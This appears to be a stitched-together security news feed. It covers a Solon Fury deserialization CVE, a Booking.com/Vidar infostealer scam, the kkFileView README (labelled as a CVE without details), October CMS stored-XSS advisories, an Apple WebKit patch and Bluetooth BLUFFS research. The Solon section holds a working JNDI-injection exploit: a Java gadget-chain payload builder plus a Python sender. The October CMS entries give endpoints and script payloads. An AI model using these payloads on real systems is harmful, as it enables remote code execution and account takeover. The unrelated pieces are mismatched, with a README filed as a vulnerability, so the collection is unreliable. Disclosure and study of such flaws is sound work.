Ssolon <= 2.6.0 and <=2.5.12 is vulnerable to Deserialization of Untrusted Data.

**Issue Description**

We recently discovered that Solon provides 'Fury' as a serialization and deserialization solution for RPC. However, our research has found that the corresponding component has a security vulnerability. Attackers can execute a JNDI injection attack using a carefully constructed attack payload.

**Vulnerability Localization**

  
The vulnerability is located at line 25 of the org.noear.solon.serialization.fury.FuryActionExecutor class, as shown in the figure above. Although Fury provides a built-in blacklist to defend against potential deserialization attacks, we will next demonstrate how to bypass this blacklist to carry out an attack.

**Vulnerability Reproduction****Configuring the RPC Service**

Issue #145 has already provided a simple configuration for an RPC server. We just need to add the following dependencies in the pom.xml file:

    <dependency>
      <groupId>org.noear</groupId>
      <artifactId>solon.serialization.fury</artifactId>
      <version>2.6.0</version>
    </dependency>
    <dependency>
      <groupId>com.caucho</groupId>
      <artifactId>quercus</artifactId>
      <version>4.0.66</version>
    </dependency>
    

**Configuring a Malicious LDAP Server**

We use ysoserial(https://github.com/frohoff/ysoserial) to set up a malicious LDAP server for subsequent JNDI injection attacks(Note that in this instance, we are demonstrating using the well-known exploit chain CommonsCollections2. To achieve a similar effect, please configure the corresponding dependencies on the RPC server side.).

**Proof of Concept**

We can obtain the serialized data required for the attack through the following PoC (Proof of Concept).

    RegistryContext registryContext = new RegistryContext("127.0.0.1", 8989, null);
    MemoryModel memoryModel = new MemoryModel();
    memoryModel.bind("evil", registryContext);
    ContextImpl context = new ContextImpl("rmi://localhost:8888/8tr4qv", memoryModel, null);
    Constructor c = QBindingEnumeration.class.getDeclaredConstructors()[0];
    c.setAccessible(true);
    ArrayList<String> list = new ArrayList<>();
    list.add("/evil/8tr4qv");
    QBindingEnumeration enumeration = (QBindingEnumeration) c.newInstance(context, list);
    XStringForFSB xString = Reflections.createWithoutConstructor(XStringForFSB.class);
    Reflections.setFieldValue(xString, "m_strCache", "nxjkas");
    
    HashMap map1 = new HashMap();
    HashMap map2 = new HashMap();
    map1.put("yy",enumeration);
    map1.put("zZ",xString);
    map2.put("yy",xString);
    map2.put("zZ",enumeration);
    
    HashMap s = new HashMap();
    setFieldValue(s, "size", 2);
    Class nodeC;
    try {
      nodeC = Class.forName("java.util.HashMap$Node");
    }
    catch ( ClassNotFoundException e ) {
      nodeC = Class.forName("java.util.HashMap$Entry");
    }
    Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
    nodeCons.setAccessible(true);
    
    Object tbl = Array.newInstance(nodeC, 2);
    Array.set(tbl, 0, nodeCons.newInstance(0, map1, map1, null));
    Array.set(tbl, 1, nodeCons.newInstance(0, map2, map2, null));
    setFieldValue(s, "table", tbl);
    
    byte[] poc = FuryUtil.fury.serialize(s);
    new FileOutputStream(new File("/tmp/serifury")).write(poc);
    

Subsequently, we can use the Python script below to send the malicious serialized data to the server, completing the exploitation (this Python script is also referenced from Issue #145).

    with open("/tmp/serifury","rb") as f:
        body= f.read()
        print(len(body))
        burp0_url = "http://127.0.0.1:8080/rpc/v1/user/getUser"
        burp0_cookies = {"_jpanonym": "\"OWQ0ZTEzNzBlMWFlYTY2NzhhMDMxOWM5MmYzMjc0MzgjMTY2NTU2NDE1MzAwOCMzMTUzNjAwMCNPR1ZpTkRVd05qWXpZbU0xTkRCaU0yRXlabVpoTlRrek5HUXpabVk1TmpJPQ==\"", "Hm_lvt_bfe2407e37bbaa8dc195c5db42daf96a": "1665564182"}
        ct = "application/fury"
        burp0_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "deflate",
            "Connection": "close", "Content-Type": ct, "Upgrade-Insecure-Requests": "1",
            "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "none", "Sec-Fetch-User": "?1"}
    
        res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=body, proxies=proxy)
        print(res.text)
    

**Attack Results**

CVE-2023-48967: A new RCE vulnerability · Issue #226 · noear/solon

By Deeba Ahmed
Vidar infostealer is capable of stealing browsing data, including passwords, cryptocurrency wallet credentials, and other personal information.
This is a post from HackRead.com Read the original post: Sophisticated Booking.com Scam Targeting Guests with Vidar Infostealer

The ‘How To’ guide for targeting Booking.com customers is being offered for sale on the dark web, as well as on underground cybercrime forums, including Russian-speaking platforms such as XSS.IS.

Cybersecurity firm Secureworks is alerting Booking.com customers to a recently identified scam wherein hotels’ Booking.com accounts are compromised to deceive users into divulging their payment details.

This fraudulent activity was detected in October 2023. Researchers have observed that cybercriminals successfully obtained access to hotel login credentials through the utilization of the **Vidar information stealer**.

While this tool is not commonly employed in such scams, in this instance, the Vidar infostealer is utilized to infiltrate the hotel’s Booking.com portal. This unauthorized access enables cybercriminals to peruse upcoming bookings and communicate directly with guests while posing as hotel staff.

Researchers from Secureworks Counter Threat Unit™ (CTU) suspect that this may be part of a broader campaign specifically aimed at targeting Booking.com users. The purloined data is presumed to be traded on underground marketplaces or forums, where it can command a higher price due to the increased potential for defrauding unsuspecting guests.

Characterizing it as a sophisticatedly crafted scam, researchers highlight that the hackers devised an email aimed at gaining the trust of **hotel employees**. The deceptive message purportedly originated from a former guest who reported losing their ID or other valuables, seeking assistance from the hotel staff to locate the items.

The subtlety of this approach meant the employee did not find it suspicious, especially since the email lacked attachments or dubious links, creating the illusion of a genuine request. Consequently, the employee responded and offered assistance.

However, a link within the email, allegedly containing a photo of the lost item, actually served to install the Vidar infostealer. Once activated, this malware illicitly acquires the hotel’s Booking.com login credentials, facilitating unauthorized access to guest reservation details.

The hook in this scam creates a sense of urgency for the guests. The attacker contacts those having reservations at the hotel through Booking.com. Guests receive urgent emails from the hotel demanding immediate payment confirmation to avoid booking cancellation. This doesn’t raise any suspicions.

Rather, it panics the guests, and they click on the provided link. According to Secureworks’ **report**, this leads them to a fake website designed to look like Booking.com, which was created to steal their payment data.

The scammers scam the guests by draining their accounts using the stolen payment data. Moreover, they sell Booking.com credentials on the **Dark Web** for up to $2,000.

The Booking.com phishing email and one of the forums selling Booking.com exploit (Screenshot credit: Secureworks)

Although Booking.com hasn’t been directly breached, the company is cooperating with impacted hotels to improve security and help affected customers. The company emphasized using machine learning to detect suspicious activity and advised hotels and customers to stay vigilant and never provide payment details without verifying the website.

“Due to the rigorous controls and the machine learning capabilities we employ, we can detect and block the overwhelming majority of suspicious activity before it impacts our partners or customers. We have also been sharing additional tips and updates with our partners about what they can do to protect themselves and their businesses, along with the latest information on malware and phishing so that they are as up-to-date as possible on the latest trends that we’re seeing.”

“It’s good to remember that no legitimate transaction will ever require a customer to provide their credit card details by phone, email, or text message (including WhatsApp)”, Booking.com stated.

This incident highlights the evolving tactics of cybercriminals and the importance of vigilance, even for seemingly harmless requests. Hotels should be especially cautious of suspicious emails and enable multi-factor authentication on Booking.com and other platforms to add an extra layer of security.

**Chris Hauk**, Consumer Privacy Advocate at Pixel Privacy, shared his comments with Hackread.com, stating that this scam is designed to target hotels with good reputations.

“This scam preys on hotels that offer good customer service, making the hotel employees believe that they are aiding a customer in retrieving a lost item. This is the first time I’ve heard of scammers taking that approach. The second step in the scam involves using a customer’s Booking.com information to convince the customer that they need to make a payment immediately.”

“Organizations like Booking.com need to work with their partners to ensure that all systems and applications are kept up to date to close security holes. Also, employee training to make them aware of how scammers work is also a must” Hauk added.

****_RELATED ARTICLES_****

1.  **The Benefits Of Blockchain In The Travel Industry**
2.  **Newly Surfaced ThirdEye Infostealer Targeting Windows Devices**
3.  **Fake ChatGPT and AI pages on Facebook are spreading infostealers**
4.  **Hotel reservation platform leaks user data from top online booking sites**
5.  **Hackers steal sensitive data from Japanese search engine for sex hotels**

Sophisticated Booking.com Scam Targeting Guests with Vidar Infostealer

kkFileView v4.3.0 is vulnerable to Incorrect Access Control.

**kkFileView****Introduction**

Document online preview project solution, built using the popular Spring Boot framework for easy setup and deployment. This versatile open source project provides basic support for a wide range of document formats, including:

1.  Supports Office documents such as doc, docx, xls, xlsx, xlsm, ppt, pptx, csv, tsv, , dotm, xlt, xltm, dot, xlam, dotx, xla, ,pages etc.
2.  Supports domestic WPS Office documents such as wps, dps, et , ett,  wpt.
3.  Supports OpenOffice, LibreOffice office documents such as odt, ods, ots, odp, otp, six, ott, fodt and fods.
4.  Supports Visio flowchart files such as vsd, vsdx.
5.  Supports Windows system image files such as wmf, emf.
6.  Supports Photoshop software model files such as psd ,eps.
7.  Supports document formats like pdf, ofd, and rtf.
8.  Supports software model files like xmind.
9.  Support for bpmn workflow files.
10.  Support for eml mail files
11.  Support for epub book documents
12.  Supports 3D model files like obj, 3ds, stl, ply, gltf, glb, off, 3dm, fbx, dae, wrl, 3mf, ifc, brep, step, iges, fcstd, bim, etc.
13.  Supports CAD model files such as dwg, dxf, dwf iges , igs, dwt , dng , ifc , dwfx , stl , cf2 , plt, etc.
14.  Supports all plain text files such as txt, xml (rendering), md (rendering), java, php, py, js, css, etc.
15.  Supports compressed packages such as zip, rar, jar, tar, gzip, 7z, etc.
16.  Supports image previewing (flip, zoom, mirror) of jpg, jpeg, png, gif, bmp, ico, jfif, webp, etc.
17.  Supports image information model files such as tif and tiff.
18.  Supports image format files such as tga.
19.  Supports vector image format files such as svg.
20.  Supports mp3,wav,mp4,flv .
21.  Supports many audio and video format files such as avi, mov, wmv, mkv, 3gp, and rm.
22.  Supports for dcm .
23.  Supports for drawio .

**Features**

*   Build with the popular frame spring boot
*   Easy to build and deploy
*   Basically support online preview of mainstream office documents, such as Doc, docx, Excel, PDF, TXT, zip, rar, pictures, etc
*   REST API
*   Abstract file preview interface so that it is easy to extend more file extensions and develop this project on your own

**Official website and DOCS**

URL：https://kkview.cn

**Live demo**

> Please treat public service kindly, or this would stop at any time.

URL：https://file.kkview.cn

**Contact Us**

> We will answer your questions carefully and solve any problems you encounter while using the project. We also kindly ask that you at least Google or Baidu before asking questions in order to save time and avoid ineffective communication. Let's cherish our lives and stay away from ineffective communication.

**Quick Start**

> Technology stack

*   Spring boot： spring boot Development Reference Guide
*   Freemarker
*   Redisson
*   Jodconverter

> Dependencies

*   Redis(Optional, Unnecessary by default)
*   OpenOffice or LibreOffice(Integrated on Windows, will be installed automatically on Linux, need to be manually installed on Mac OS)

1.  First step：git pull https://github.com/kekingcn/kkFileView.git
    
2.  second step：Run the main method of /server/src/main/java/cn/keking/ServerMain.java. After starting,visit http://localhost:8012/.
    

**Changelog**

> December 14, 2022, version 4.1.0 released:

1.  Updated homepage design by @wsd7747.
2.  Compatible with multipage tif for pdf and jpg conversion and multiple page online preview for tif image preview by @zhangzhen1979.
3.  Optimized docker build, using layered build method by @yl-yue.
4.  Implemented file encryption based on userToken cache by @yl-yue.
5.  Implemented preview for encrypted Word, PPT, and Excel files by @yl-yue.
6.  Upgraded Linux & Docker images to LibreOffice 7.3.
7.  Updated OFD preview component, tif preview component, and added support for PPT watermarking.
8.  Numerous other upgrades, optimizations, and bug fixes. We thank @yl-yue, @wsd7747, @zhangzhen1979, @tomhusky, @shenghuadun, and @kischn.sun for their code contributions.

> July 6, 2021, version 4.0.0 released:

1.  The integration of OpenOffice in the underlying system has been replaced with LibreOffice, resulting in enhanced compatibility and improved preview effects for Office files.
2.  Fixed the directory traversal vulnerability in compressed files.
3.  Fixed the issue where previewing PPT files in PDF mode was ineffective.
4.  Fixed the issue where the front-end display of image preview mode for PPT files was abnormal.
5.  Added a new feature: the file upload function on the homepage can be enabled or disabled in real-time through configuration.
6.  Optimized the logging of Office process shutdown.
7.  Optimized the logic for finding Office components in Windows environment, with built-in LibreOffice taking priority.
8.  Optimized the synchronous execution of starting Office processes.

> June 17, 2021, version 3.6.0 released:

This version includes support for OFD file type versions, and all the important features in this release were contributed by the community. We thank @gaoxingzaq and @zhangxiaoxiao9527 for their code contributions.

1.  Added support for previewing OFD type files. OFD is a domestically produced file format similar to PDF.
2.  Added support for transcoding and previewing video files through ffmpeg. With transcoding enabled, theoretically, all mainstream video file formats such as RM, RMVB, FLV, etc. are supported for preview.
3.  Beautified the preview effect of PPT and PPTX file types, much better looking than the previous version.
4.  Updated the versions of dependencies such as pdfbox, xstream, common-io.

> January 28, 2021:

The final update of the Lunar New Year 2020 has been released, mainly including some UI improvements, bug fixes reported by QQ group users and issues, and most importantly, it is a new version for a good year.

1.  Introduced galimatias to solve the problem of abnormal file download caused by non-standard file names.
2.  Updated UI style of index access demonstration interface.
3.  Updated UI style of markdown file preview.
4.  Updated UI style of XML file preview, adjusted the architecture of text file preview to facilitate expansion.
5.  Updated UI style of simTxT file preview.
6.  Adjusted the UI of continuous preview of multiple images to flip up and down.
7.  Simplified all file download IO operations by adopting the apache-common-io package.
8.  XML file preview supports switching to pure text mode.
9.  Enhanced prompt information when url base64 decoding fails.
10.  Fixed import errors and image preview bug.
11.  Fixed the problem of missing log directory when running the release package.
12.  Fixed the bug of continuous preview of multiple images in the compressed package.
13.  Fixed the problem of no universal matching for file type suffixes in uppercase and lowercase.
14.  Specified the use of the Apache Commons-code implementation for Base64 encoding to fix exceptions occurring in some JDK versions.
15.  Fixed the bug of HTML file preview of text-like files.
16.  Fixed the problem of inability to switch between jpg and pdf when previewing dwg files.
17.  Escaped dangerous characters to prevent reflected xss.
18.  Fixed the problem of duplicate encoding causing the failure of document-to-image preview and standardized the encoding.

> December 27, 2020:

The year-end major update of 2020 includes comprehensive architecture design, complete code refactoring, significant improvement in code quality, and more convenient secondary development. We welcome you to review the source code and contribute to building by raising issues and pull requests.

1.  Adjusted architecture modules, extensively refactored code, and improved code quality by several levels. Please feel free to review.
2.  Enhanced XML file preview effect and added preview of XML document structure.
3.  Added support for markdown file preview, including support for md rendering and switching between source text and preview.
4.  Switched the underlying web server to jetty, resolving the issue: #168
5.  Introduced cpdetector to solve the problem of file encoding recognition.
6.  Adopted double encoding with base64 and urlencode for URLs to completely solve preview problems with bizarre file names.
7.  Added configuration item office.preview.switch.disabled to control the switch of office file preview.
8.  Optimized text file preview logic, transmitting content through Base64 to avoid requesting file content again during preview.
9.  Disabled the image zoom effect in office preview mode to achieve consistent experience with image and pdf preview.
10.  Directly set pdfbox to be compatible with lower version JDK, and there will be no warning prompts even when run in IDEA.
11.  Removed non-essential toolkits like Guava and Hutool to reduce code volume.
12.  Asynchronous loading of Office components speeds up application launch to within 5 seconds.
13.  Reasonable settings of the number of threads in the preview consumption queue.
14.  Fixed the bug where files in compressed packages failed to preview again.
15.  Fixed the bug in image preview.

> May 20th 2020 ：

1.  Support for global watermark and dynamic change of watermark content through parameters
2.  Support for CAD file Preview
3.  Add configuration item base.url, support using nginx reverse proxy and set context-path
4.  All configuration items can be read from environment variables, which is convenient for docker image deployment and large-scale use in cluster
5.  Support the configuration of TrustHost (only the file source from the trust site can be previewed), and protect the preview service from abuse
6.  Support configuration of customize cache cleanup time (cron expression)
7.  All recognizable plain text can be previewed directly without downloading, such as .md .java .py, etc
8.  Support configuration to limit PDF file download after conversion
9.  Optimize Maven packaging configuration to solve the problem of line break in .sh script
10.  Place all CDN dependencies on the front end locally for users without external network connection
11.  Comment Service on home page switched from Sohu ChangYan to gitalk
12.  Fixed preview exceptions that may be caused by special characters in the URL
13.  Fixed the addtask exception of the transformation file queue
14.  Fixed other known issues
15.  Official website build: https://kkview.cn
16.  Official docker image repository build: https://hub.docker.com/r/keking/kkfileview

> June 18th 2019 ：

1.  Support automatic cleaning of cache and preview files
2.  Support http/https stream url file preview
3.  Support FTP url file preview
4.  Add Docker build

> April 8th 2019

1.  Cache and queue implementations abstract, providing JDK and REDIS implementations (REDIS becomes optional dependencies)
2.  Provides zip and tar.gz packages, and provides a one-click startup script

> January 17th 2018

1.  Refined the project directory, abstract file preview interface, Easy to extend more file extensions and depoly this project on your own
2.  Added English documentation (@幻幻Fate，@汝辉) contribution
3.  Support for more image file extensions
4.  Fixed the issue that image carousel in zip file will always start from the first

> January 12th 2018

1.  Support for multiple images preview
2.  Support for images rotation preview in rar/zip

> January 2nd 2018

1.  Fixed gibberish issue when preview a txt document caused by the file encoding problem
2.  Fixed the issue that some module dependencies can not be found
3.  Add a spring boot profile, and support for Multi-environment configuration
4.  Add pdf.js to preview the documents such as doc,etc.,support for generating doc headlines as pdf menu，support for mobile preview

**Sponsor Us**

If this project has been helpful to you, we welcome your sponsorship. Your support is our greatest motivation.！

CVE-2023-48815: GitHub - kekingcn/kkFileView: Universal File Online Preview Project based on Spring-Boot

October CMS version 3.4.0 suffers from a persistent cross site scripting vulnerability when a user has article posting capabilities.

    OctoberCMS v3.4.0 (Wiki_article) Stored Cross-Site Scripting VulnerabilityVendor: October CMSProduct web page: https://www.octobercms.comAffected version: 3.4.0Summary: OctoberCMS is a self-hosted content management system (CMS)based on the PHP programming language and Laravel web application framework.It supports MySQL, SQLite and PostgreSQL for the database back end anduses a flat file database for the front end structure. The October CMScovers a range of capabilities such as users, permissions, themes, andplugins, and is seen as a simpler alternative to WordPress.Desc: OctoberCMS suffers from stored cross-site scripting vulnerabilitywhen a user with the ability to create an article could perform a storedXSS attack against any other users with the ability to create an article.This can lead to execute arbitrary HTML/JS code in a user's browser sessionin context of an affected site.Tested on: macOS Monterey 12.6.3           Docker 4.12.0 (85629)           PHP/8.1.6Vulnerability discovered by Nazli Soysal Kuran                            @zeroscienceAdvisory ID: ZSL-2023-5807Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5807.php30.10.2023--Stored XSS (EntryRecord[content]):----------------------------------Endpoint: /backend/tailor/entries/wiki_articlePayload: EntryRecord%5Bcontent%5D="<script>alert(1)</script>"

October CMS 3.4.0 Wiki Article Cross Site Scripting

October CMS version 3.4.0 suffers from a persistent cross site scripting vulnerability when a user has category-creating capabilities.

    OctoberCMS v3.4.0 (Category) Stored Cross-Site Scripting VulnerabilityVendor: October CMSProduct web page: https://www.octobercms.comAffected version: 3.4.0Summary: OctoberCMS is a self-hosted content management system (CMS)based on the PHP programming language and Laravel web application framework.It supports MySQL, SQLite and PostgreSQL for the database back end anduses a flat file database for the front end structure. The October CMScovers a range of capabilities such as users, permissions, themes, andplugins, and is seen as a simpler alternative to WordPress.Desc: OctoberCMS suffers from stored cross-site scripting vulnerabilitywhen a user with the ability to a category-creating feature that storesdata persistently could create a stored XSS attack against any other usersvisiting the blog page. This can lead to execute arbitrary HTML/JS codein a user's browser session in context of an affected site.Tested on: macOS Monterey 12.6.3           Docker 4.12.0 (85629)           PHP/8.1.6Vulnerability discovered by Nazli Soysal Kuran                            @zeroscienceAdvisory ID: ZSL-2023-5806Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5806.php30.10.2023--Stored XSS (EntryRecord[title]):--------------------------------Endpoint: POST /backend/tailor/entries/blog_category/createPayload: EntryRecord%5Btitle%5D="</title><script>alert(1)</script>"

October CMS 3.4.0 Category Cross Site Scripting

October CMS version 3.4.0 suffers from a persistent cross site scripting vulnerability when a user has blog-creating capabilities.

    OctoberCMS v3.4.0 (Blog) Stored Cross-Site Scripting VulnerabilitiesVendor: October CMSProduct web page: https://www.octobercms.comAffected version: 3.4.0Summary: OctoberCMS is a self-hosted content management system (CMS)based on the PHP programming language and Laravel web application framework.It supports MySQL, SQLite and PostgreSQL for the database back end anduses a flat file database for the front end structure. The October CMScovers a range of capabilities such as users, permissions, themes, andplugins, and is seen as a simpler alternative to WordPress.Desc: OctoberCMS suffers from stored cross-site scripting vulnerabilitywhen a user with the ability to a blog-creating feature that stores datapersistently could perform a stored XSS attack against any other usersvisiting the blog page. This can lead to execute arbitrary HTML/JS codein a user's browser session in context of an affected site.Tested on: macOS Monterey 12.6.3           Docker 4.12.0 (85629)           PHP/8.1.6Vulnerability discovered by Nazli Soysal Kuran                            @zeroscienceAdvisory ID: ZSL-2023-5805Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5805.php30.10.2023--Stored XSS (GlobalRecord[blog_name]):-------------------------------------Endpoint: POST /backend/tailor/globals/blog_configPayload: GlobalRecord%5Bblog_name%5D="</title><script>alert(1)</script>"

October CMS 3.4.0 Blog Cross Site Scripting

October CMS version 3.4.0 suffers from a persistent cross site scripting vulnerability when a user has author posting capabilities.

    OctoberCMS v3.4.0 (Author) Stored Cross-Site Scripting VulnerabilityVendor: October CMSProduct web page: https://www.octobercms.comAffected version: 3.4.0Summary: OctoberCMS is a self-hosted content management system (CMS)based on the PHP programming language and Laravel web application framework.It supports MySQL, SQLite and PostgreSQL for the database back end anduses a flat file database for the front end structure. The October CMScovers a range of capabilities such as users, permissions, themes, andplugins, and is seen as a simpler alternative to WordPress.Desc: OctoberCMS suffers from stored cross-site scripting vulnerabilitywhen a user with the ability to be an author feature could perform a storedXSS attack against any other users visiting the posts by the author. Thiscan lead to execute arbitrary HTML/JS code in a user's browser sessionin context of an affected site.Tested on: macOS Monterey 12.6.3           Docker 4.12.0 (85629)           PHP/8.1.6Vulnerability discovered by Nazli Soysal Kuran                            @zeroscienceAdvisory ID: ZSL-2023-5804Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5804.php30.10.2023--Stored XSS (EntryRecord[title]):--------------------------------Endpoint: /backend/tailor/entries/blog_authorPayload: EntryRecord%5Btitle%5D ="</title><script>alert(1)</script>"

October CMS 3.4.0 Author Cross Site Scripting

October CMS version 3.4.0 suffers from a persistent cross site scripting vulnerability where a user has the ability to edit the landing/about page.

    OctoberCMS v3.4.0 (About) Stored Cross-Site Scripting VulnerabilityVendor: October CMSProduct web page: https://www.octobercms.comAffected version: 3.4.0Summary: OctoberCMS is a self-hosted content management system (CMS)based on the PHP programming language and Laravel web application framework.It supports MySQL, SQLite and PostgreSQL for the database back end anduses a flat file database for the front end structure. The October CMScovers a range of capabilities such as users, permissions, themes, andplugins, and is seen as a simpler alternative to WordPress.Desc: OctoberCMS suffers from stored cross-site scripting vulnerabilitywhen a user with the ability to edit the landing/about page. This canlead to execute arbitrary HTML/JS code in a user's browser session incontext of an affected site.Tested on: macOS Monterey 12.6.3           Docker 4.12.0 (85629)           PHP/8.1.6Vulnerability discovered by Nazli Soysal Kuran                            @zeroscienceAdvisory ID: ZSL-2023-5803Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5803.php30.10.2023--Stored XSS (EntryRecord[blocks][1][content]):---------------------------------------------Endpoint: POST /backend/tailor/entries/landing_pagePayload: EntryRecord%5Bblocks%5D%5B1%5D%5Bcontent%5D="<script>alert(1)</script>"

October CMS 3.4.0 About Cross Site Scripting

Apple has released an emergency security update for two zero-day vulnerabilities which may have already been exploited.

Apple has released emergency security updates for iOS 17.1.2 and iPadOS 17.1.2 to patch for two zero-day vulnerabilities that may have been actively exploited.

Apple said both vulnerabilities were in the WebKit component, which is the engine that powers Safari browser on Macs as well as all browsers on iPhones and iPads. It is also the web browser engine used by Mail, App Store, and many other apps on macOS, iOS, and Linux.

The updates are available for the following:

*   iPhone XS and later
*   iPad Pro 12.9-inch 2nd generation and later
*   iPad Pro 10.5-inch
*   iPad Pro 11-inch 1st generation and later
*   iPad Air 3rd generation and later
*   iPad 6th generation and later
*   iPad mini 5th generation and later.
*   macOS Sonoma 14.1.2
*   Safari 17.1.2.

The updates may already have reached you if you automatically update, but it doesn’t hurt to check if your device is at the latest update level.

If a Safari update is available for your device, you can get it by updating your iPhone or iPad or updating your Mac.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Update your iPhones! Apple fixes two zero-days in iOS 

New research has unearthed multiple novel attacks that break Bluetooth Classic's forward secrecy and future secrecy guarantees, resulting in adversary-in-the-middle (AitM) scenarios between two already connected peers.
The issues, collectively named BLUFFS, impact Bluetooth Core Specification 4.2 through 5.4. They are tracked under the identifier CVE-2023-24023 (CVSS score: 6.8)

New research has unearthed multiple novel attacks that break Bluetooth Classic's forward secrecy and future secrecy guarantees, resulting in adversary-in-the-middle (AitM) scenarios between two already connected peers.

The issues, collectively named **BLUFFS**, impact Bluetooth Core Specification 4.2 through 5.4. They are tracked under the identifier CVE-2023-24023 (CVSS score: 6.8) and were responsibly disclosed in October 2022.

The attacks "enable device impersonation and machine-in-the-middle across sessions by only compromising one session key," EURECOM researcher Daniele Antonioli said in a study published late last month.

This is made possible by leveraging two new flaws in the Bluetooth standard's session key derivation mechanism that allow the derivation of the same key across sessions.

UPCOMING WEBINAR

Learn Insider Threat Detection with Application Response Strategies

Discover how application detection, response, and automated behavior modeling can revolutionize your defense against insider threats.

Join Now

While forward secrecy in key-agreement cryptographic protocols ensures that past communications are not revealed, even if the private keys to a particular exchange are revealed by a passive attacker, future secrecy (aka backward secrecy) guarantees the confidentiality of future messages should the past keys get corrupted.

In other words, forward secrecy protects past sessions against future compromises of keys.

The attack works by weaponizing four architectural vulnerabilities, including the aforementioned two flaws, in the specification of the Bluetooth session establishment process to derive a weak session key, and subsequently brute-force it to spoof arbitrary victims.

The AitM attacker impersonating the paired device could then negotiate a connection with the other end to establish a subsequent encryption procedure using legacy encryption.

In doing so, "an attacker in proximity may ensure that the same encryption key is used for every session while in proximity and force the lowest supported encryption key length," the Bluetooth Special Interest Group (SIG) said.

"Any conforming BR/EDR implementation is expected to be vulnerable to this attack on session key establishment, however, the impact may be limited by refusing access to host resources from a downgraded session, or by ensuring sufficient key entropy to make session key reuse of limited utility to an attacker."

Furthermore, an attacker can take advantage of the shortcomings to brute-force the encryption key in real-time, thereby enabling live injection attacks on traffic between vulnerable peers.

The success of the attack, however, presupposes that an attacking device is within the wireless range of two vulnerable Bluetooth devices initiating a pairing procedure and that the adversary can capture Bluetooth packets in plaintext and ciphertext, known as the victim's Bluetooth address, and craft Bluetooth packets.

As mitigations, SIG recommends that Bluetooth implementations reject service-level connections on an encrypted baseband link with key strengths below 7 octets, have devices operate in "Secure Connections Only Mode" to ensure sufficient key strength, and pair is done via "Secure Connections" mode as opposed the legacy mode.

The disclosure comes as ThreatLocker detailed a Bluetooth impersonation attack that can abuse the pairing mechanism to gain wireless access to Apple macOS systems via the Bluetooth connection and launch a reverse shell.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#mac